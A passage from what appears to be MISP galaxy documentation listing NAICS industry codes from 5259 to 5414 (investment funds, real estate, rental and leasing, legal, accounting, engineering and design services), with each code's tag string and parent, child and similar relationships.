  • parent-of: misp-galaxy:naics="52592" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="525920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="52599" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="525990" with estimative-language:likelihood-probability="likely"

52591

Open-End Investment Funds

The tag is: misp-galaxy:naics="52591"

52591 has relationships with:

  • child-of: misp-galaxy:naics="5259" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="525910" with estimative-language:likelihood-probability="likely"

525910

Open-End Investment Funds

The tag is: misp-galaxy:naics="525910"

525910 has relationships with:

  • child-of: misp-galaxy:naics="5259" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52591" with estimative-language:likelihood-probability="likely"

52592

Trusts, Estates, and Agency Accounts

The tag is: misp-galaxy:naics="52592"

52592 has relationships with:

  • child-of: misp-galaxy:naics="5259" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="525920" with estimative-language:likelihood-probability="likely"

525920

Trusts, Estates, and Agency Accounts

The tag is: misp-galaxy:naics="525920"

525920 has relationships with:

  • child-of: misp-galaxy:naics="5259" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52592" with estimative-language:likelihood-probability="likely"

52599

Other Financial Vehicles

The tag is: misp-galaxy:naics="52599"

52599 has relationships with:

  • child-of: misp-galaxy:naics="5259" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="525990" with estimative-language:likelihood-probability="likely"

525990

Other Financial Vehicles

The tag is: misp-galaxy:naics="525990"

525990 has relationships with:

  • child-of: misp-galaxy:naics="5259" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="52599" with estimative-language:likelihood-probability="likely"

53

Real Estate and Rental and Leasing

The tag is: misp-galaxy:naics="53"

53 has relationships with:

  • parent-of: misp-galaxy:naics="531" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="533" with estimative-language:likelihood-probability="likely"

531

Real Estate

The tag is: misp-galaxy:naics="531"

531 has relationships with:

  • child-of: misp-galaxy:naics="53" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5313" with estimative-language:likelihood-probability="likely"

5311

Lessors of Real Estate

The tag is: misp-galaxy:naics="5311"

5311 has relationships with:

  • child-of: misp-galaxy:naics="531" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="531110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="531120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="531130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53119" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="531190" with estimative-language:likelihood-probability="likely"

53111

Lessors of Residential Buildings and Dwellings

The tag is: misp-galaxy:naics="53111"

53111 has relationships with:

  • child-of: misp-galaxy:naics="5311" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="531110" with estimative-language:likelihood-probability="likely"

531110

Lessors of Residential Buildings and Dwellings

The tag is: misp-galaxy:naics="531110"

531110 has relationships with:

  • child-of: misp-galaxy:naics="5311" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53111" with estimative-language:likelihood-probability="likely"

53112

Lessors of Nonresidential Buildings (except Miniwarehouses)

The tag is: misp-galaxy:naics="53112"

53112 has relationships with:

  • child-of: misp-galaxy:naics="5311" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="531120" with estimative-language:likelihood-probability="likely"

531120

Lessors of Nonresidential Buildings (except Miniwarehouses)

The tag is: misp-galaxy:naics="531120"

531120 has relationships with:

  • child-of: misp-galaxy:naics="5311" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53112" with estimative-language:likelihood-probability="likely"

53113

Lessors of Miniwarehouses and Self-Storage Units

The tag is: misp-galaxy:naics="53113"

53113 has relationships with:

  • child-of: misp-galaxy:naics="5311" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="531130" with estimative-language:likelihood-probability="likely"

531130

Lessors of Miniwarehouses and Self-Storage Units

The tag is: misp-galaxy:naics="531130"

531130 has relationships with:

  • child-of: misp-galaxy:naics="5311" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53113" with estimative-language:likelihood-probability="likely"

53119

Lessors of Other Real Estate Property

The tag is: misp-galaxy:naics="53119"

53119 has relationships with:

  • child-of: misp-galaxy:naics="5311" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="531190" with estimative-language:likelihood-probability="likely"

531190

Lessors of Other Real Estate Property

The tag is: misp-galaxy:naics="531190"

531190 has relationships with:

  • child-of: misp-galaxy:naics="5311" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53119" with estimative-language:likelihood-probability="likely"

5312

Offices of Real Estate Agents and Brokers

The tag is: misp-galaxy:naics="5312"

5312 has relationships with:

  • child-of: misp-galaxy:naics="531" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="531210" with estimative-language:likelihood-probability="likely"

53121

Offices of Real Estate Agents and Brokers

The tag is: misp-galaxy:naics="53121"

53121 has relationships with:

  • child-of: misp-galaxy:naics="5312" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="531210" with estimative-language:likelihood-probability="likely"

531210

Offices of Real Estate Agents and Brokers

The tag is: misp-galaxy:naics="531210"

531210 has relationships with:

  • child-of: misp-galaxy:naics="5312" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53121" with estimative-language:likelihood-probability="likely"

5313

Activities Related to Real Estate

The tag is: misp-galaxy:naics="5313"

5313 has relationships with:

  • child-of: misp-galaxy:naics="531" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="531311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="531312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="531320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53139" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="531390" with estimative-language:likelihood-probability="likely"

53131

Real Estate Property Managers

The tag is: misp-galaxy:naics="53131"

53131 has relationships with:

  • child-of: misp-galaxy:naics="5313" with estimative-language:likelihood-probability="likely"

531311

Residential Property Managers

The tag is: misp-galaxy:naics="531311"

531311 has relationships with:

  • child-of: misp-galaxy:naics="5313" with estimative-language:likelihood-probability="likely"

531312

Nonresidential Property Managers

The tag is: misp-galaxy:naics="531312"

531312 has relationships with:

  • child-of: misp-galaxy:naics="5313" with estimative-language:likelihood-probability="likely"

53132

Offices of Real Estate Appraisers

The tag is: misp-galaxy:naics="53132"

53132 has relationships with:

  • child-of: misp-galaxy:naics="5313" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="531320" with estimative-language:likelihood-probability="likely"

531320

Offices of Real Estate Appraisers

The tag is: misp-galaxy:naics="531320"

531320 has relationships with:

  • child-of: misp-galaxy:naics="5313" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53132" with estimative-language:likelihood-probability="likely"

53139

Other Activities Related to Real Estate

The tag is: misp-galaxy:naics="53139"

53139 has relationships with:

  • child-of: misp-galaxy:naics="5313" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="531390" with estimative-language:likelihood-probability="likely"

531390

Other Activities Related to Real Estate

The tag is: misp-galaxy:naics="531390"

531390 has relationships with:

  • child-of: misp-galaxy:naics="5313" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53139" with estimative-language:likelihood-probability="likely"

532

Rental and Leasing Services

The tag is: misp-galaxy:naics="532"

532 has relationships with:

  • child-of: misp-galaxy:naics="53" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5322" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5323" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5324" with estimative-language:likelihood-probability="likely"

5321

Automotive Equipment Rental and Leasing

The tag is: misp-galaxy:naics="5321"

5321 has relationships with:

  • child-of: misp-galaxy:naics="532" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532120" with estimative-language:likelihood-probability="likely"

53211

Passenger Car Rental and Leasing

The tag is: misp-galaxy:naics="53211"

53211 has relationships with:

  • child-of: misp-galaxy:naics="5321" with estimative-language:likelihood-probability="likely"

532111

Passenger Car Rental

The tag is: misp-galaxy:naics="532111"

532111 has relationships with:

  • child-of: misp-galaxy:naics="5321" with estimative-language:likelihood-probability="likely"

532112

Passenger Car Leasing

The tag is: misp-galaxy:naics="532112"

532112 has relationships with:

  • child-of: misp-galaxy:naics="5321" with estimative-language:likelihood-probability="likely"

53212

Truck, Utility Trailer, and RV (Recreational Vehicle) Rental and Leasing

The tag is: misp-galaxy:naics="53212"

53212 has relationships with:

  • child-of: misp-galaxy:naics="5321" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="532120" with estimative-language:likelihood-probability="likely"

532120

Truck, Utility Trailer, and RV (Recreational Vehicle) Rental and Leasing

The tag is: misp-galaxy:naics="532120"

532120 has relationships with:

  • child-of: misp-galaxy:naics="5321" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53212" with estimative-language:likelihood-probability="likely"

5322

Consumer Goods Rental

The tag is: misp-galaxy:naics="5322"

5322 has relationships with:

  • child-of: misp-galaxy:naics="532" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53228" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532281" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532282" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532283" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532284" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532289" with estimative-language:likelihood-probability="likely"

53221

Consumer Electronics and Appliances Rental

The tag is: misp-galaxy:naics="53221"

53221 has relationships with:

  • child-of: misp-galaxy:naics="5322" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="532210" with estimative-language:likelihood-probability="likely"

532210

Consumer Electronics and Appliances Rental

The tag is: misp-galaxy:naics="532210"

532210 has relationships with:

  • child-of: misp-galaxy:naics="5322" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53221" with estimative-language:likelihood-probability="likely"

53228

Other Consumer Goods Rental

The tag is: misp-galaxy:naics="53228"

53228 has relationships with:

  • child-of: misp-galaxy:naics="5322" with estimative-language:likelihood-probability="likely"

532281

Formal Wear and Costume Rental

The tag is: misp-galaxy:naics="532281"

532281 has relationships with:

  • child-of: misp-galaxy:naics="5322" with estimative-language:likelihood-probability="likely"

532282

Video Tape and Disc Rental

The tag is: misp-galaxy:naics="532282"

532282 has relationships with:

  • child-of: misp-galaxy:naics="5322" with estimative-language:likelihood-probability="likely"

532283

Home Health Equipment Rental

The tag is: misp-galaxy:naics="532283"

532283 has relationships with:

  • child-of: misp-galaxy:naics="5322" with estimative-language:likelihood-probability="likely"

532284

Recreational Goods Rental

The tag is: misp-galaxy:naics="532284"

532284 has relationships with:

  • child-of: misp-galaxy:naics="5322" with estimative-language:likelihood-probability="likely"

532289

All Other Consumer Goods Rental

The tag is: misp-galaxy:naics="532289"

532289 has relationships with:

  • child-of: misp-galaxy:naics="5322" with estimative-language:likelihood-probability="likely"

5323

General Rental Centers

The tag is: misp-galaxy:naics="5323"

5323 has relationships with:

  • child-of: misp-galaxy:naics="532" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532310" with estimative-language:likelihood-probability="likely"

53231

General Rental Centers

The tag is: misp-galaxy:naics="53231"

53231 has relationships with:

  • child-of: misp-galaxy:naics="5323" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="532310" with estimative-language:likelihood-probability="likely"

532310

General Rental Centers

The tag is: misp-galaxy:naics="532310"

532310 has relationships with:

  • child-of: misp-galaxy:naics="5323" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53231" with estimative-language:likelihood-probability="likely"

5324

Commercial and Industrial Machinery and Equipment Rental and Leasing

The tag is: misp-galaxy:naics="5324"

5324 has relationships with:

  • child-of: misp-galaxy:naics="532" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53241" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53242" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532420" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53249" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="532490" with estimative-language:likelihood-probability="likely"

53241

Construction, Transportation, Mining, and Forestry Machinery and Equipment Rental and Leasing

The tag is: misp-galaxy:naics="53241"

53241 has relationships with:

  • child-of: misp-galaxy:naics="5324" with estimative-language:likelihood-probability="likely"

532411

Commercial Air, Rail, and Water Transportation Equipment Rental and Leasing

The tag is: misp-galaxy:naics="532411"

532411 has relationships with:

  • child-of: misp-galaxy:naics="5324" with estimative-language:likelihood-probability="likely"

532412

Construction, Mining, and Forestry Machinery and Equipment Rental and Leasing

The tag is: misp-galaxy:naics="532412"

532412 has relationships with:

  • child-of: misp-galaxy:naics="5324" with estimative-language:likelihood-probability="likely"

53242

Office Machinery and Equipment Rental and Leasing

The tag is: misp-galaxy:naics="53242"

53242 has relationships with:

  • child-of: misp-galaxy:naics="5324" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="532420" with estimative-language:likelihood-probability="likely"

532420

Office Machinery and Equipment Rental and Leasing

The tag is: misp-galaxy:naics="532420"

532420 has relationships with:

  • child-of: misp-galaxy:naics="5324" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53242" with estimative-language:likelihood-probability="likely"

53249

Other Commercial and Industrial Machinery and Equipment Rental and Leasing

The tag is: misp-galaxy:naics="53249"

53249 has relationships with:

  • child-of: misp-galaxy:naics="5324" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="532490" with estimative-language:likelihood-probability="likely"

532490

Other Commercial and Industrial Machinery and Equipment Rental and Leasing

The tag is: misp-galaxy:naics="532490"

532490 has relationships with:

  • child-of: misp-galaxy:naics="5324" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53249" with estimative-language:likelihood-probability="likely"

533

Lessors of Nonfinancial Intangible Assets (except Copyrighted Works)

The tag is: misp-galaxy:naics="533"

533 has relationships with:

  • child-of: misp-galaxy:naics="53" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5331" with estimative-language:likelihood-probability="likely"

5331

Lessors of Nonfinancial Intangible Assets (except Copyrighted Works)

The tag is: misp-galaxy:naics="5331"

5331 has relationships with:

  • child-of: misp-galaxy:naics="533" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="53311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="533110" with estimative-language:likelihood-probability="likely"

53311

Lessors of Nonfinancial Intangible Assets (except Copyrighted Works)

The tag is: misp-galaxy:naics="53311"

53311 has relationships with:

  • child-of: misp-galaxy:naics="5331" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="533110" with estimative-language:likelihood-probability="likely"

533110

Lessors of Nonfinancial Intangible Assets (except Copyrighted Works)

The tag is: misp-galaxy:naics="533110"

533110 has relationships with:

  • child-of: misp-galaxy:naics="5331" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="53311" with estimative-language:likelihood-probability="likely"

54

Professional, Scientific, and Technical Services

The tag is: misp-galaxy:naics="54"

54 has relationships with:

  • parent-of: misp-galaxy:naics="541" with estimative-language:likelihood-probability="likely"

541

Professional, Scientific, and Technical Services

The tag is: misp-galaxy:naics="541"

541 has relationships with:

  • child-of: misp-galaxy:naics="54" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5414" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5415" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5417" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

5411

Legal Services

The tag is: misp-galaxy:naics="5411"

5411 has relationships with:

  • child-of: misp-galaxy:naics="541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54119" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541199" with estimative-language:likelihood-probability="likely"

54111

Offices of Lawyers

The tag is: misp-galaxy:naics="54111"

54111 has relationships with:

  • child-of: misp-galaxy:naics="5411" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541110" with estimative-language:likelihood-probability="likely"

541110

Offices of Lawyers

The tag is: misp-galaxy:naics="541110"

541110 has relationships with:

  • child-of: misp-galaxy:naics="5411" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54111" with estimative-language:likelihood-probability="likely"

54112

Offices of Notaries

The tag is: misp-galaxy:naics="54112"

54112 has relationships with:

  • child-of: misp-galaxy:naics="5411" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541120" with estimative-language:likelihood-probability="likely"

541120

Offices of Notaries

The tag is: misp-galaxy:naics="541120"

541120 has relationships with:

  • child-of: misp-galaxy:naics="5411" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54112" with estimative-language:likelihood-probability="likely"

54119

Other Legal Services

The tag is: misp-galaxy:naics="54119"

54119 has relationships with:

  • child-of: misp-galaxy:naics="5411" with estimative-language:likelihood-probability="likely"

541191

Title Abstract and Settlement Offices

The tag is: misp-galaxy:naics="541191"

541191 has relationships with:

  • child-of: misp-galaxy:naics="5411" with estimative-language:likelihood-probability="likely"

541199

All Other Legal Services

The tag is: misp-galaxy:naics="541199"

541199 has relationships with:

  • child-of: misp-galaxy:naics="5411" with estimative-language:likelihood-probability="likely"

5412

Accounting, Tax Preparation, Bookkeeping, and Payroll Services

The tag is: misp-galaxy:naics="5412"

5412 has relationships with:

  • child-of: misp-galaxy:naics="541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541214" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541219" with estimative-language:likelihood-probability="likely"

54121

Accounting, Tax Preparation, Bookkeeping, and Payroll Services

The tag is: misp-galaxy:naics="54121"

54121 has relationships with:

  • child-of: misp-galaxy:naics="5412" with estimative-language:likelihood-probability="likely"

541211

Offices of Certified Public Accountants

The tag is: misp-galaxy:naics="541211"

541211 has relationships with:

  • child-of: misp-galaxy:naics="5412" with estimative-language:likelihood-probability="likely"

541213

Tax Preparation Services

The tag is: misp-galaxy:naics="541213"

541213 has relationships with:

  • child-of: misp-galaxy:naics="5412" with estimative-language:likelihood-probability="likely"

541214

Payroll Services

The tag is: misp-galaxy:naics="541214"

541214 has relationships with:

  • child-of: misp-galaxy:naics="5412" with estimative-language:likelihood-probability="likely"

541219

Other Accounting Services

The tag is: misp-galaxy:naics="541219"

541219 has relationships with:

  • child-of: misp-galaxy:naics="5412" with estimative-language:likelihood-probability="likely"

5413

Architectural, Engineering, and Related Services

The tag is: misp-galaxy:naics="5413"

5413 has relationships with:

  • child-of: misp-galaxy:naics="541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54133" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541330" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54134" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541340" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54135" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541350" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54136" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541360" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54137" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541370" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54138" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541380" with estimative-language:likelihood-probability="likely"

54131

Architectural Services

The tag is: misp-galaxy:naics="54131"

54131 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541310" with estimative-language:likelihood-probability="likely"

541310

Architectural Services

The tag is: misp-galaxy:naics="541310"

541310 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54131" with estimative-language:likelihood-probability="likely"

54132

Landscape Architectural Services

The tag is: misp-galaxy:naics="54132"

54132 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541320" with estimative-language:likelihood-probability="likely"

541320

Landscape Architectural Services

The tag is: misp-galaxy:naics="541320"

541320 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54132" with estimative-language:likelihood-probability="likely"

54133

Engineering Services

The tag is: misp-galaxy:naics="54133"

54133 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541330" with estimative-language:likelihood-probability="likely"

541330

Engineering Services

The tag is: misp-galaxy:naics="541330"

541330 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54133" with estimative-language:likelihood-probability="likely"

54134

Drafting Services

The tag is: misp-galaxy:naics="54134"

54134 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541340" with estimative-language:likelihood-probability="likely"

541340

Drafting Services

The tag is: misp-galaxy:naics="541340"

541340 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54134" with estimative-language:likelihood-probability="likely"

54135

Building Inspection Services

The tag is: misp-galaxy:naics="54135"

54135 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541350" with estimative-language:likelihood-probability="likely"

541350

Building Inspection Services

The tag is: misp-galaxy:naics="541350"

541350 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54135" with estimative-language:likelihood-probability="likely"

54136

Geophysical Surveying and Mapping Services

The tag is: misp-galaxy:naics="54136"

54136 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541360" with estimative-language:likelihood-probability="likely"

541360

Geophysical Surveying and Mapping Services

The tag is: misp-galaxy:naics="541360"

541360 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54136" with estimative-language:likelihood-probability="likely"

54137

Surveying and Mapping (except Geophysical) Services

The tag is: misp-galaxy:naics="54137"

54137 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541370" with estimative-language:likelihood-probability="likely"

541370

Surveying and Mapping (except Geophysical) Services

The tag is: misp-galaxy:naics="541370"

541370 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54137" with estimative-language:likelihood-probability="likely"

54138

Testing Laboratories and Services

The tag is: misp-galaxy:naics="54138"

54138 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541380" with estimative-language:likelihood-probability="likely"

541380

Testing Laboratories and Services

The tag is: misp-galaxy:naics="541380"

541380 has relationships with:

  • child-of: misp-galaxy:naics="5413" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54138" with estimative-language:likelihood-probability="likely"

5414

Specialized Design Services

The tag is: misp-galaxy:naics="5414"

5414 has relationships with:

  • child-of: misp-galaxy:naics="541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54142" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541420" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54143" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541430" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54149" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541490" with estimative-language:likelihood-probability="likely"

54141

Interior Design Services

The tag is: misp-galaxy:naics="54141"

54141 has relationships with:

  • child-of: misp-galaxy:naics="5414" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541410" with estimative-language:likelihood-probability="likely"

541410

Interior Design Services

The tag is: misp-galaxy:naics="541410"

541410 has relationships with:

  • child-of: misp-galaxy:naics="5414" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54141" with estimative-language:likelihood-probability="likely"

54142

Industrial Design Services

The tag is: misp-galaxy:naics="54142"

54142 has relationships with:

  • child-of: misp-galaxy:naics="5414" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541420" with estimative-language:likelihood-probability="likely"

541420

Industrial Design Services

The tag is: misp-galaxy:naics="541420"

541420 has relationships with:

  • child-of: misp-galaxy:naics="5414" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54142" with estimative-language:likelihood-probability="likely"

54143

Graphic Design Services

The tag is: misp-galaxy:naics="54143"

54143 has relationships with:

  • child-of: misp-galaxy:naics="5414" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541430" with estimative-language:likelihood-probability="likely"

541430

Graphic Design Services

The tag is: misp-galaxy:naics="541430"

541430 has relationships with:

  • child-of: misp-galaxy:naics="5414" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54143" with estimative-language:likelihood-probability="likely"

54149

Other Specialized Design Services

The tag is: misp-galaxy:naics="54149"

54149 has relationships with:

  • child-of: misp-galaxy:naics="5414" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541490" with estimative-language:likelihood-probability="likely"

541490

Other Specialized Design Services

The tag is: misp-galaxy:naics="541490"

541490 has relationships with:

